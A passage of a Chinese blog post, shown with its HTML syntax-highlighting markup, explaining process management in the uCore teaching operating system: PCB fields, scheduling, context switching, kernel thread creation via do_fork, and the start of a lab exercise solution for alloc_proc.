  <span class="type">uint32_t</span> eip;</span><br><span class="line">    <span class="type">uint32_t</span> esp;</span><br><span class="line">    <span class="type">uint32_t</span> ebx;</span><br><span class="line">    <span class="type">uint32_t</span> ecx;</span><br><span class="line">    <span class="type">uint32_t</span> edx;</span><br><span class="line">    <span class="type">uint32_t</span> esi;</span><br><span class="line">    <span class="type">uint32_t</span> edi;</span><br><span class="line">    <span class="type">uint32_t</span> ebp;</span><br><span class="line">&#125;;</span><br><span class="line"></span><br><span class="line"><span class="keyword">struct</span> <span class="title class_">proc_struct</span> &#123;</span><br><span class="line">    <span class="keyword">enum</span> <span class="title class_">proc_state</span> state;          <span class="comment">// 当前进程的状态</span></span><br><span class="line">    <span class="type">int</span> pid;                        <span class="comment">// 进程ID</span></span><br><span class="line">    <span class="type">int</span> runs;                       <span class="comment">// 当前进程被调度的次数</span></span><br><span class="line">    <span class="type">uintptr_t</span> kstack;               <span class="comment">// 内核栈</span></span><br><span class="line">    <span class="keyword">volatile</span> <span class="type">bool</span> need_resched;     <span class="comment">// 是否需要被调度</span></span><br><span class="line">    <span class="keyword">struct</span> <span class="title class_">proc_struct</span> *parent;     <span class="comment">// 父进程ID</span></span><br><span class="line">    <span class="keyword">struct</span> <span class="title class_">mm_struct</span> *mm;           <span class="comment">// 当前进程所管理的虚拟内存页，包括其所属的页目录项PDT</span></span><br><span class="line">    <span class="keyword">struct</span> <span class="title class_">context</span> context;         <span class="comment">// 保存的上下文</span></span><br><span class="line">    <span class="keyword">struct</span> <span class="title class_">trapframe</span> *tf;           <span class="comment">// 中断所保存的上下文</span></span><br><span class="line">    <span class="type">uintptr_t</span> cr3;                  <span class="comment">// 页目录表的地址</span></span><br><span class="line">    <span class="type">uint32_t</span> flags;                 <span class="comment">// 当前进程的相关标志</span></span><br><span class="line">    <span class="type">char</span> name[PROC_NAME_LEN + <span class="number">1</span>];   <span class="comment">// 进程名称（可执行文件名）</span></span><br><span class="line">    <span class="type">list_entry_t</span> list_link;         <span class="comment">// 用于连接list</span></span><br><span class="line">    <span class="type">list_entry_t</span> hash_link;         <span class="comment">// 用于连接hash list</span></span><br><span class="line">&#125;;</span><br></pre></td></tr></table></figure><p>由于进程数量可能较大，倘若从头向后遍历查找符合某个状态的PCB，则效率会十分低下，因此使用了哈希表作为遍历所用的数据结构。</p></li></ul><h5 id="c-切换流程">c. 切换流程</h5><ul><li><p>uCore中，内核的第一个进程<code>idleproc</code>会执行<code>cpu_idle</code>函数，并从中调用<code>schedule</code>函数，准备开始调度进程。</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">void</span> <span class="title">cpu_idle</span><span class="params">(<span class="type">void</span>)</span> </span>&#123;</span><br><span class="line">    <span class="keyword">while</span> (<span class="number">1</span>)</span><br><span class="line">        <span class="keyword">if</span> (current-&gt;need_resched)</span><br><span class="line">            <span class="built_in">schedule</span>();</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li><li><p><code>schedule</code>函数会先清除调度标志，并从当前进程在链表中的位置开始，遍历进程控制块，直到找出处于<strong>就绪状态</strong>的进程。</p><p>之后执行<code>proc_run</code>函数，将环境切换至该进程的上下文并继续执行。</p><blockquote><p>需要注意的是，这个进程调度过程中不能被CPU中断给打断，原因是这可能造成条件竞争。</p></blockquote><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">void</span></span></span><br><span class="line"><span class="function"><span class="title">schedule</span><span class="params">(<span class="type">void</span>)</span> </span>&#123;</span><br><span class="line">    <span class="type">bool</span> intr_flag;</span><br><span class="line">    <span class="type">list_entry_t</span> *le, *last;</span><br><span class="line">    <span class="keyword">struct</span> <span class="title class_">proc_struct</span> *next = <span class="literal">NULL</span>;</span><br><span class="line">    <span class="built_in">local_intr_save</span>(intr_flag);</span><br><span class="line">    &#123;</span><br><span class="line">        current-&gt;need_resched = <span class="number">0</span>;</span><br><span class="line">        last = (current == idleproc) ? &amp;proc_list : &amp;(current-&gt;list_link);</span><br><span class="line">        le = last;</span><br><span class="line">        <span class="keyword">do</span> &#123;</span><br><span class="line">            <span class="keyword">if</span> ((le = <span class="built_in">list_next</span>(le)) != &amp;proc_list) &#123;</span><br><span class="line">                next = <span class="built_in">le2proc</span>(le, list_link);</span><br><span class="line">                <span class="keyword">if</span> (next-&gt;state == PROC_RUNNABLE)</span><br><span class="line">                    <span class="keyword">break</span>;</span><br><span class="line">            &#125;</span><br><span class="line">        &#125; <span class="keyword">while</span> (le != last);</span><br><span class="line">        <span class="keyword">if</span> (next == <span class="literal">NULL</span> || next-&gt;state != PROC_RUNNABLE)</span><br><span class="line">            next = idleproc;</span><br><span class="line">        next-&gt;runs ++;</span><br><span class="line">        <span class="keyword">if</span> (next != current)</span><br><span class="line">            <span class="built_in">proc_run</span>(next);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="built_in">local_intr_restore</span>(intr_flag);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li><li><p><code>proc_run</code>函数会设置TSS中ring0的内核栈地址，同时还会加载页目录表的地址。等到这些前置操作完成后，最后执行上下文切换。</p><blockquote><p>同样，设置内核栈地址与加载页目录项等这类关键操作不能被中断给打断。</p></blockquote><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">void</span> <span class="title">proc_run</span><span class="params">(<span class="keyword">struct</span> proc_struct *proc)</span> </span>&#123;</span><br><span class="line">    <span class="keyword">if</span> (proc != current) &#123;</span><br><span class="line">        <span class="type">bool</span> intr_flag;</span><br><span class="line">        <span class="keyword">struct</span> <span class="title class_">proc_struct</span> *prev = current, *next = proc;</span><br><span class="line">        <span class="built_in">local_intr_save</span>(intr_flag);</span><br><span class="line">        &#123;</span><br><span class="line">            <span class="comment">// 设置当前执行的进程</span></span><br><span class="line">            current = proc;</span><br><span class="line">            <span class="comment">// 设置ring0的内核栈地址</span></span><br><span class="line">            <span class="built_in">load_esp0</span>(next-&gt;kstack + KSTACKSIZE);</span><br><span class="line">            <span class="comment">// 加载页目录表</span></span><br><span class="line">            <span class="built_in">lcr3</span>(next-&gt;cr3);</span><br><span class="line">            <span class="comment">// 切换上下文</span></span><br><span class="line">            switch_to(&amp;(prev-&gt;context), &amp;(next-&gt;context));</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="built_in">local_intr_restore</span>(intr_flag);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li><li><p>切换上下文的操作基本上都是直接与寄存器打交道，所以<code>switch_to</code>函数使用汇编代码编写，详细信息以注释的形式写入代码中。</p><figure class="highlight mipsasm"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">.text</span></span><br><span class="line">.globl <span class="keyword">switch_to</span></span><br><span class="line"><span class="keyword"></span><span class="keyword">switch_to: </span>                     <span class="comment"># switch_to(from, to)</span></span><br><span class="line">    <span class="comment"># save from&#x27;s registers</span></span><br><span class="line">    movl <span class="number">4</span>(%esp), %eax          <span class="comment"># 获取当前进程的context结构地址</span></span><br><span class="line">    popl <span class="number">0</span>(%eax)                <span class="comment"># 将eip保存至当前进程的context结构</span></span><br><span class="line">    movl %esp, <span class="number">4</span>(%eax)          <span class="comment"># 将esp保存至当前进程的context结构</span></span><br><span class="line">    movl %ebx, <span class="number">8</span>(%eax)          <span class="comment"># 将ebx保存至当前进程的context结构</span></span><br><span class="line">    movl %ecx, <span class="number">12</span>(%eax)         <span class="comment"># 将ecx保存至当前进程的context结构</span></span><br><span class="line">    movl %edx, <span class="number">16</span>(%eax)         <span class="comment"># 将edx保存至当前进程的context结构</span></span><br><span class="line">    movl %esi, <span class="number">20</span>(%eax)         <span class="comment"># 将esi保存至当前进程的context结构</span></span><br><span class="line">    movl %edi, <span class="number">24</span>(%eax)         <span class="comment"># 将edi保存至当前进程的context结构</span></span><br><span class="line">    movl %ebp, <span class="number">28</span>(%eax)         <span class="comment"># 将ebp保存至当前进程的context结构</span></span><br><span class="line"></span><br><span class="line">    <span class="comment"># restore to&#x27;s registers</span></span><br><span class="line">    movl <span class="number">4</span>(%esp), %eax          <span class="comment"># 获取下一个进程的context结构地址</span></span><br><span class="line">                                <span class="comment"># 需要注意的是，其地址不是8(%esp)，因为之前已经pop过一次栈。</span></span><br><span class="line">    movl <span class="number">28</span>(%eax), %ebp         <span class="comment"># 恢复ebp至下一个进程的context结构</span></span><br><span class="line">    movl <span class="number">24</span>(%eax), %edi         <span class="comment"># 恢复edi至下一个进程的context结构</span></span><br><span class="line">    movl <span class="number">20</span>(%eax), %esi         <span class="comment"># 恢复esi至下一个进程的context结构</span></span><br><span class="line">    movl <span class="number">16</span>(%eax), %edx         <span class="comment"># 恢复edx至下一个进程的context结构</span></span><br><span class="line">    movl <span class="number">12</span>(%eax), %ecx         <span class="comment"># 恢复ecx至下一个进程的context结构</span></span><br><span class="line">    movl <span class="number">8</span>(%eax), %ebx          <span class="comment"># 恢复ebx至下一个进程的context结构</span></span><br><span class="line">    movl <span class="number">4</span>(%eax), %esp          <span class="comment"># 恢复esp至下一个进程的context结构</span></span><br><span class="line">    pushl <span class="number">0</span>(%eax)               <span class="comment"># 插入下一个进程的eip，以便于ret到下个进程的代码位置。</span></span><br><span class="line">    ret</span><br></pre></td></tr></table></figure></li></ul><h4 id="2-进程创建">2) 进程创建</h4><ul><li><p>在Unix中，进程通过系统调用<code>fork</code>和<code>exec</code>来创建一个进程。</p><ul><li>其中，<code>fork</code>把一个进程复制成两个<strong>除PID以外完全相同</strong>的进程。</li><li><code>exec</code>用新进程来重写当前进程，PID没有改变。</li></ul></li><li><p><code>fork</code>创建一个继承的子进程。该子进程复制父进程的所有变量和内存，以及父进程的所有CPU寄存器（除了某个特殊寄存器，以区分是子进程还是父进程）。</p></li><li><p><code>fork</code>函数一次调用，返回两个值。父进程中返回子进程的PID，子进程中返回0。</p></li><li><p><code>fork</code>函数的<strong>开销十分昂贵</strong>，其实现开销来源于</p><ul><li>对子进程分配内存。</li><li>复制父进程的内存和寄存器到子进程中。</li></ul><p>而且，在大多数情况下，调用<code>fork</code>函数后就紧接着调用<code>exec</code>，此时<code>fork</code>中的内存复制操作是无用的。因此，<code>fork</code>函数中使用<strong>写时复制技术(Copy on Write， COW)</strong>。</p></li></ul><h5 id="a-空闲进程的创建">a. 空闲进程的创建</h5><ul><li><p>空闲进程主要工作是完成内核中各个子系统的初始化，并最后用于调度其他进程。该进程最终会一直在<code>cpu_idle</code>函数中判断当前是否可调度。</p></li><li><p>由于该进程是为了调度进程而创建的，所以其<code>need_resched</code>成员初始时为1。</p></li><li><p>uCore创建该空闲进程的源代码如下</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// 分配一个proc_struct结构</span></span><br><span class="line"><span class="keyword">if</span> ((idleproc = <span class="built_in">alloc_proc</span>()) == <span class="literal">NULL</span>)</span><br><span class="line">    <span class="built_in">panic</span>(<span class="string">&quot;cannot alloc idleproc.\n&quot;</span>);</span><br><span class="line"><span class="comment">// 该空闲进程作为第一个进程，pid为0</span></span><br><span class="line">idleproc-&gt;pid = <span class="number">0</span>;</span><br><span class="line"><span class="comment">// 设置该空闲进程始终可运行</span></span><br><span class="line">idleproc-&gt;state = PROC_RUNNABLE;</span><br><span class="line"><span class="comment">// 设置空闲进程的内核栈</span></span><br><span class="line">idleproc-&gt;kstack = (<span class="type">uintptr_t</span>)bootstack;</span><br><span class="line"><span class="comment">// 设置该空闲进程为可调度</span></span><br><span class="line">idleproc-&gt;need_resched = <span class="number">1</span>;</span><br><span class="line"><span class="built_in">set_proc_name</span>(idleproc, <span class="string">&quot;idle&quot;</span>);</span><br><span class="line">nr_process++;</span><br><span class="line"><span class="comment">// 设置当前运行的进程为该空闲进程</span></span><br><span class="line">current = idleproc;</span><br></pre></td></tr></table></figure></li></ul><h5 id="b-第一个内核进程的创建">b. 第一个内核进程的创建</h5><ul><li><p>第一个内核进程是未来所有新进程的父进程或祖先进程。</p></li><li><p>uCore创建第一个内核进程的代码如下</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// 创建init的主线程</span></span><br><span class="line"><span class="type">int</span> pid = <span class="built_in">kernel_thread</span>(init_main, <span class="string">&quot;Hello world!!&quot;</span>, <span class="number">0</span>);</span><br><span class="line"><span class="keyword">if</span> (pid &lt;= <span class="number">0</span>) &#123;</span><br><span class="line">    <span class="built_in">panic</span>(<span class="string">&quot;create init_main failed.\n&quot;</span>);</span><br><span class="line">&#125;</span><br><span class="line"><span class="comment">// 通过pid 查找proc_struct</span></span><br><span class="line">initproc = <span class="built_in">find_proc</span>(pid);</span><br><span class="line"><span class="built_in">set_proc_name</span>(initproc, <span class="string">&quot;init&quot;</span>);</span><br></pre></td></tr></table></figure></li><li><p>在<code>kernel_thread</code>中，程序先设置<code>trapframe</code>结构，最后调用<code>do_fork</code>函数。注意该<code>trapframe</code>部分寄存器<code>ebx、edx、eip</code>被分别设置为<strong>目标函数地址</strong>、<strong>参数地址</strong>以及<strong>kernel_thread_entry</strong>地址（稍后会讲）。</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">int</span></span></span><br><span class="line"><span class="function"><span class="title">kernel_thread</span><span class="params">(<span class="type">int</span> (*fn)(<span class="type">void</span> *), <span class="type">void</span> *arg, <span class="type">uint32_t</span> clone_flags)</span> </span>&#123;</span><br><span class="line">    <span class="keyword">struct</span> <span class="title class_">trapframe</span> tf;</span><br><span class="line">    <span class="built_in">memset</span>(&amp;tf, <span class="number">0</span>, <span class="built_in">sizeof</span>(<span class="keyword">struct</span> trapframe));</span><br><span class="line">    tf.tf_cs = KERNEL_CS;</span><br><span class="line">    tf.tf_ds = tf.tf_es = tf.tf_ss = KERNEL_DS;</span><br><span class="line">    <span class="comment">// ebx = fn</span></span><br><span class="line">    tf.tf_regs.reg_ebx = (<span class="type">uint32_t</span>)fn;</span><br><span class="line">    <span class="comment">// edx = arg</span></span><br><span class="line">    tf.tf_regs.reg_edx = (<span class="type">uint32_t</span>)arg;</span><br><span class="line">    <span class="comment">// eip = kernel_thread_entry</span></span><br><span class="line">    tf.tf_eip = (<span class="type">uint32_t</span>)kernel_thread_entry;</span><br><span class="line">    <span class="keyword">return</span> <span class="built_in">do_fork</span>(clone_flags | CLONE_VM, <span class="number">0</span>, &amp;tf);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li><li><p><code>do_fork</code>函数会执行以下操作</p><ul><li>分配新进程的PCB，并设置PCB相关成员，包括父进程PCB地址，新内核栈地址，新PID等等。</li><li>复制/共享当前进程的所有内存空间到子进程里。</li><li>复制当前线程的上下文状态至子进程中。</li><li>将子进程PCB分别插入至普通双向链表与哈希表中，设置该子进程为可执行，并最终返回该子进程的PID。</li></ul><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">int</span></span></span><br><span class="line"><span class="function"><span class="title">do_fork</span><span class="params">(<span class="type">uint32_t</span> clone_flags, <span class="type">uintptr_t</span> stack, <span class="keyword">struct</span> trapframe *tf)</span> </span>&#123;</span><br><span class="line">    <span class="type">int</span> ret = -E_NO_FREE_PROC;</span><br><span class="line">    <span class="keyword">struct</span> <span class="title class_">proc_struct</span> *proc;</span><br><span class="line">    <span class="keyword">if</span> (nr_process &gt;= MAX_PROCESS)</span><br><span class="line">        <span class="keyword">goto</span> fork_out;</span><br><span class="line">    ret = -E_NO_MEM;</span><br><span class="line"></span><br><span class="line">    <span class="comment">// 首先分配一个PCB</span></span><br><span class="line">    <span class="keyword">if</span> ((proc = <span class="built_in">alloc_proc</span>()) == <span class="literal">NULL</span>)</span><br><span class="line">        <span class="keyword">goto</span> fork_out;</span><br><span class="line">    <span class="comment">// fork肯定存在父进程，所以设置子进程的父进程</span></span><br><span class="line">    proc-&gt;parent = current;</span><br><span class="line">    <span class="comment">// 分配内核栈</span></span><br><span class="line">    <span class="keyword">if</span> (<span class="built_in">setup_kstack</span>(proc) != <span class="number">0</span>)</span><br><span class="line">        <span class="keyword">goto</span> bad_fork_cleanup_proc;</span><br><span class="line">    <span class="comment">// 将所有虚拟页数据复制过去</span></span><br><span class="line">    <span class="keyword">if</span> (<span class="built_in">copy_mm</span>(clone_flags, proc) != <span class="number">0</span>)</span><br><span class="line">        <span class="keyword">goto</span> bad_fork_cleanup_kstack;</span><br><span class="line">    <span class="comment">// 复制线程的状态，包括寄存器上下文等等</span></span><br><span class="line">    <span class="built_in">copy_thread</span>(proc, stack, tf);</span><br><span class="line">    <span class="comment">// 将子进程的PCB添加进hash list或者list</span></span><br><span class="line">    <span class="comment">// 需要注意的是，不能让中断处理程序打断这一步操作</span></span><br><span class="line">    <span class="type">bool</span> intr_flag;</span><br><span class="line">    <span class="built_in">local_intr_save</span>(intr_flag);</span><br><span class="line">    &#123;</span><br><span class="line">        proc-&gt;pid = <span class="built_in">get_pid</span>();</span><br><span class="line">        <span class="built_in">hash_proc</span>(proc);</span><br><span class="line">        <span class="built_in">list_add</span>(&amp;proc_list, &amp;(proc-&gt;list_link));</span><br><span class="line">        nr_process ++;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="built_in">local_intr_restore</span>(intr_flag);</span><br><span class="line">    <span class="comment">// 设置新的子进程可执行</span></span><br><span class="line">    <span class="built_in">wakeup_proc</span>(proc);</span><br><span class="line">    <span class="comment">// 返回子进程的pid</span></span><br><span class="line">    ret = proc-&gt;pid;</span><br><span class="line"></span><br><span class="line">fork_out:</span><br><span class="line">    <span class="keyword">return</span> ret;</span><br><span class="line">bad_fork_cleanup_kstack:</span><br><span class="line">    <span class="built_in">put_kstack</span>(proc);</span><br><span class="line">bad_fork_cleanup_proc:</span><br><span class="line">    <span class="built_in">kfree</span>(proc);</span><br><span class="line">    <span class="keyword">goto</span> fork_out;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li><li><p><code>do_fork</code>函数中的<code>copy_thread</code>函数会执行以下操作</p><ul><li><p>将<code>kernel_thread</code>中创建的新<code>trapframe</code>内容复制到该<code>proc</code>的<code>tf</code>成员中，并压入该进程自身的内核栈。</p></li><li><p>设置<code>trapframe</code>的<code>eax</code>寄存器值为0，<code>esp</code>寄存器值为传入的<code>esp</code>，以及<code>eflags</code>加上中断标志位。</p><blockquote><p>设置eax寄存器的值为0，是因为子进程的fork函数返回的值为0。</p></blockquote></li><li><p>最后，设置子进程上下文的<code>eip</code>为<code>forkret</code>，<code>esp</code>为该<code>trapframe</code>的地址。</p></li></ul><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">static</span> <span class="type">void</span></span></span><br><span class="line"><span class="function"><span class="title">copy_thread</span><span class="params">(<span class="keyword">struct</span> proc_struct *proc, <span class="type">uintptr_t</span> esp, <span class="keyword">struct</span> trapframe *tf)</span> </span>&#123;</span><br><span class="line">    proc-&gt;tf = (<span class="keyword">struct</span> trapframe *)(proc-&gt;kstack + KSTACKSIZE) - <span class="number">1</span>;</span><br><span class="line">    *(proc-&gt;tf) = *tf;</span><br><span class="line">    proc-&gt;tf-&gt;tf_regs.reg_eax = <span class="number">0</span>;</span><br><span class="line">    proc-&gt;tf-&gt;tf_esp = esp;</span><br><span class="line">    proc-&gt;tf-&gt;tf_eflags |= FL_IF;</span><br><span class="line"></span><br><span class="line">    proc-&gt;context.eip = (<span class="type">uintptr_t</span>)forkret;</span><br><span class="line">    proc-&gt;context.esp = (<span class="type">uintptr_t</span>)(proc-&gt;tf);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li><li><p>当该子进程被调度运行，上下文切换后（即此时current为该子进程的PCB地址），子进程会跳转至<code>forkret</code>，而该函数是<code>forkrets</code>的一个wrapper。</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">static</span> <span class="type">void</span> <span class="title">forkret</span><span class="params">(<span class="type">void</span>)</span> </span>&#123;</span><br><span class="line">    forkrets(current-&gt;tf);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p><code>forkrets</code>是干什么用的呢？从<code>current-&gt;tf</code>中恢复上下文，跳转至<code>current-&gt;tf-&gt;tf_eip</code>，也就是<code>kernel_thread_entry</code>。</p><figure class="highlight x86asm"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line">    # return falls through to trapret...</span><br><span class="line"><span class="meta">.globl</span> __trapret</span><br><span class="line"><span class="symbol">__trapret:</span></span><br><span class="line">    # restore registers from stack</span><br><span class="line">    popal</span><br><span class="line"></span><br><span class="line">    # restore %ds, %es, %fs <span class="keyword">and</span> %gs</span><br><span class="line">    popl %gs</span><br><span class="line">    popl %fs</span><br><span class="line">    popl %es</span><br><span class="line">    popl %ds</span><br><span class="line"></span><br><span class="line">    # get rid of the trap number <span class="keyword">and</span> error code</span><br><span class="line">    addl <span class="number">$0</span>x8, %esp</span><br><span class="line">    <span class="keyword">iret</span></span><br><span class="line"><span class="meta"></span></span><br><span class="line"><span class="meta">.globl</span> forkrets</span><br><span class="line"><span class="symbol">forkrets:</span></span><br><span class="line">    # set stack to this new process<span class="string">&#x27;s trapframe</span></span><br><span class="line"><span class="string">    movl 4(%esp), %esp</span></span><br><span class="line"><span class="string">    jmp __trapret</span></span><br></pre></td></tr></table></figure></li><li><p><code>kernel_thread_entry</code>的代码非常简单，压入<code>%edx</code>寄存器的值作为参数，并调用<code>%ebx</code>寄存器所指向的代码，最后保存调用的函数的返回值，并<code>do_exit</code>。</p><p>以<code>initproc</code>为例，该函数此时的<code>%edx</code>即<code>&quot;Hello world!!&quot;</code>字符串的地址，<code>%ebx</code>即<code>init_main</code>函数的地址。</p><figure class="highlight x86asm"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">.text</span>.</span><br><span class="line"><span class="meta">.globl</span> kernel_thread_entry</span><br><span class="line"><span class="symbol">kernel_thread_entry:</span>        # void kernel_thread(void)</span><br><span class="line"></span><br><span class="line">    pushl %edx              # <span class="keyword">push</span> arg</span><br><span class="line">    <span class="keyword">call</span> *%ebx              # <span class="keyword">call</span> fn</span><br><span class="line"></span><br><span class="line">    pushl %eax              # save the return value of fn(arg)</span><br><span class="line">    <span class="keyword">call</span> do_exit            # <span class="keyword">call</span> do_exit to terminate current thread</span><br></pre></td></tr></table></figure><blockquote><p><code>kernel_thread</code>函数设置控制流起始地址为<code>kernel_thread_entry</code>的目的，是想让一个内核进程在执行完函数后能够<strong>自动调用<code>do_exit</code>回收资源</strong>。</p></blockquote></li></ul><h4 id="3-进程终止">3) 进程终止</h4><p>​这里只简单介绍进程的<strong>有序终止</strong>。</p><ul><li>进程结束时调用<code>exit()</code>，完成进程资源回收。</li><li><code>exit</code>函数调用的功能<ul><li>将调用参数作为进程的“结果”</li><li>关闭所有打开的文件等占用资源。</li><li>释放内存</li><li>释放大部分进程相关的内核数据结构</li><li>检查父进程是否存活<ul><li>如果存活，则保留结果的值，直到父进程使用。同时当前进程进入僵尸(zombie)状态。</li><li>如果没有，它将释放所有的数据结构，进程结束。</li></ul></li><li>清理所有等待的僵尸进程。</li></ul></li><li>进程终止是最终的垃圾收集（资源回收）。</li></ul><h2 id="练习解答">练习解答</h2><h3 id="1-练习1">1) 练习1</h3><blockquote><p><strong>分配并初始化一个进程控制块。</strong></p><p>alloc_proc函数（位于kern/process/proc.c中）负责分配并返回一个新的struct proc_struct结构，用于存储新建立的内核线程的管理信息。ucore需要对这个结构进行最基本的初始化，你需要完成这个初始化过程。</p></blockquote><p>相关实现代码如下</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">static</span> <span class="keyword">struct</span> <span class="title class_">proc_struct</span> * <span class="built_in">alloc_proc</span>(<span class="type">void</span>) &#123;</span><br><span class="line">    <span class="keyword">struct</span> <span class="title class_">proc_struct</span> *proc = <span class="built_in">kmalloc</span>(<span class="built_in">sizeof</span>(<span class="keyword">struct</span> proc_struct));</span><br><span class="line">    <span class="keyword">if</span> (proc != <span class="literal">NULL</span>) &#123;</span><br><span class="line">    <span class="comment">//LAB4:EXERCISE1 YOUR CODE</span></span><br><span class="line">        proc-&gt;state = PROC_UNINIT;</span><br><span class="line">        proc-&gt;pid = <span class="number">-1</span>;</span><br><span class="line">        proc-&gt;runs = <span class="number">0</span>;</span><br><span class="line">        proc-&gt;kstack = <span class="number">0</span>;</span><br><span class="line">        proc-&gt;need_resched = <span class="number">0</span>;</span><br><span class="line">        proc-&gt;parent = <span class="literal">NULL</span>;</span><br><span class="line">        proc-&gt;mm = <span class="literal">NULL</span>;</span><br><span class="line">        <span 